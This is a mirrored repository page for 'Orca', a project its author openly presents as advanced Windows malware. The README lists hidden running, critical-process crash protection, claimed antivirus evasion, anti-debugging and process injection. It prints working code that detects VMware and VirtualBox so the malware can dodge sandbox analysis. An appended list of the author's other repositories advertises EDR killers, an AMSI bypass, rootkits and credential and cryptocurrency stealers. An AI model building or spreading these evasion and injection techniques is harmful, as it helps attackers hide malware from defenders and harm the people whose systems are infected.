• This repository has been archived on 03/Mar/2023
  • Stars
    star
    189
  • Rank 204,649 (Top 5 %)
  • Language
    C++
  • Created almost 4 years ago
  • Updated almost 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Incomplete project

About Orca

  • Orca is an Advanced Malware with multifeatures written in ASM/C/C++

features

  • Run in Background (Hidden Mode)

Critical Process using RtlSetProcessIsCritical

  • RtlSetProcessIsCritical makes the process critical, any attempt to terminate it will BSOD the system (Blue Screen of Death) , although it can be bypassed easly using NtSetInformationProcess by injecting DLL into it , i made PoC of it you can check it from here BypassRtlSetProcessIsCritical


  • Undectable (60+ Antivirus )


Detecting Virtual Environment Files and Processes

  • Code Snippets
  • the following Function will search for VMware Processes
void antiVm()
{
	const char* arr[] = { "vmtoolsd.exe","vmwaretray.exe","vmwareuser.exe" ,"VGAuthService.exe" ,"vmacthlp.exe" };
	for (int i = 0; i < strlen(*arr); i++)
	{
		if (GetPID(arr[i]))
			exit(EXIT_FAILURE);
	}
}
  • the following Function will search for VirtualBox Files
void antiVr() {
	if  (IsExist("C:\\windows\\System32\\vboxoglpackspu.dll"))exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxSF.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxVideo.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglpassthroughspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxdisp.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxhook.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxmrxnp.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxogl.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglcrutil.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxGuest.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglerrorspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglfeedbackspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxMouse.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglarrayspu.dll")) exit(EXIT_FAILURE);
}

Anti-Debug

  • the Malware will self close 'Silently' anytime detect a debugger or being debugged!! AntiDBG Library
  • The techniques that used to Detect debuggers :
  - Memory
  - CPU
  - Timing
  - Forced Exceptions

Process Injection

  • Process Injection It is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the processโ€™s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

Alt Text

TECHNICAL DETAILS

  • Open process with Access Rights
  • LPTHREAD_START_ROUTINE (its a pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and represents the starting address of the thread in the remote process. The function must exist in the remote process.)
  • VirtualAllocEx (used to allocate space from the target process virtual memory)
  • WriteProcessMemory (used to write the path of the shellcode into the allocated memory)
  • CreateRemoteThread (used to creates a thread in the virtual memory area of a process)

More Advanced features will be added soon

Disclaimer

  • I take no responsibility for Harmful using or any damage can make. Use it at your own risk.

More Repositories

1

Terminator

Reproducing Spyboy technique to terminate all EDR/XDR/AVs processes
C++
923
star
2

Blackout

kill anti-malware protected processes ( BYOVD) (Microsoft Won )
C++
887
star
3

Chaos-Rootkit

Now You See Me, Now You Don't
C++
841
star
4

Amsi-Killer

Lifetime AMSI bypass
C++
587
star
5

APT38-0day-Stealer

APT38 Tactic PoC for Stealing 0days from security professionals
C++
267
star
6

C2-Hunter

Extract C2 Traffic
C++
245
star
7

Handle-Ripper

simple Windows handle hijacker with a nod to Apxaey for inspiration
C++
200
star
8

Bypass-Sandbox-Evasion

Bypass Malware Sandbox Evasion Ram check
C++
133
star
9

Tokenizer

Kernel Mode Driver for Elevating Process Privileges
C
129
star
10

Shellcode-Injector

x64/x86 shellcode injector
C++
111
star
11

SleepKiller

Bypass Malware Time Delays
C++
97
star
12

URootkit

user-mode Rootkit
C++
97
star
13

Wizard-Loader

Abuse Xwizard.exe for DLL Side-Loading
C++
83
star
14

U-Boat

Russian Wipers Dropper (educational-purposes )
C++
83
star
15

Overlord

abusing Process Hacker driver to terminate other processes (BYOVD)
C++
79
star
16

Hooks_Hunter

Detect API Hooks
C++
67
star
17

DeadLight

C# Malware that Steal Discord Token Directly From Memory and bypass any kind of token protection
C#
57
star
18

Dll-Injector

simple C++ dll injector
C++
53
star
19

BufferOverFlow

Exploit Windows-Based BufferOverflow (vulnserver)
C
44
star
20

TrampHook

x86 Trampoline Hook
C++
37
star
21

Among-Us-External

external hack for Among Us (PATCHED)
C++
36
star
22

Btc-Grabber

x86 Btc Stealer with Thread Hijack implemented (educational-purposes)
C++
34
star
23

Thread-Hijacking

Thread Execution Hijacking technique
C++
34
star
24

RSPCKiller

RtlSetProcessIsCritical Killer
C++
30
star
25

CE_AC_CI_EX

Solving game hacking challenges (CE/AC) using ASM/C++
Assembly
28
star
26

Mail_Killer

anonymous spam E-mail sender
Python
22
star
27

WDropper

C++ PowerShell dropper
C++
21
star
28

IFEO-PoC

Image File Execution Options Injection PoC
C++
19
star
29

KlTroll

Trolling Keyloggers by Forcing them to log Specific Text then freezing them
C++
17
star
30

AX509

subdomain finder
Python
10
star
31

AC-External

(basic)AC external hack written in C++
C++
10
star
32

CiaIoctl

User/Kernel Mode communication using IOCTL
C
9
star
33

Malware-IOCs

some of my IOCs from malware investigations
YARA
8
star
34

GRage

x86 Funny malware that Troll GTA players by killing the character every time it respawn
C++
8
star
35

HackTheBox-CubeMadness

external hack for CubeMadness
C++
5
star
36

ShEye

Simple Program To Detect API Hooks by Scanning OpCode Patterns
C++
2
star
37

Malwares-IDEAS

1
star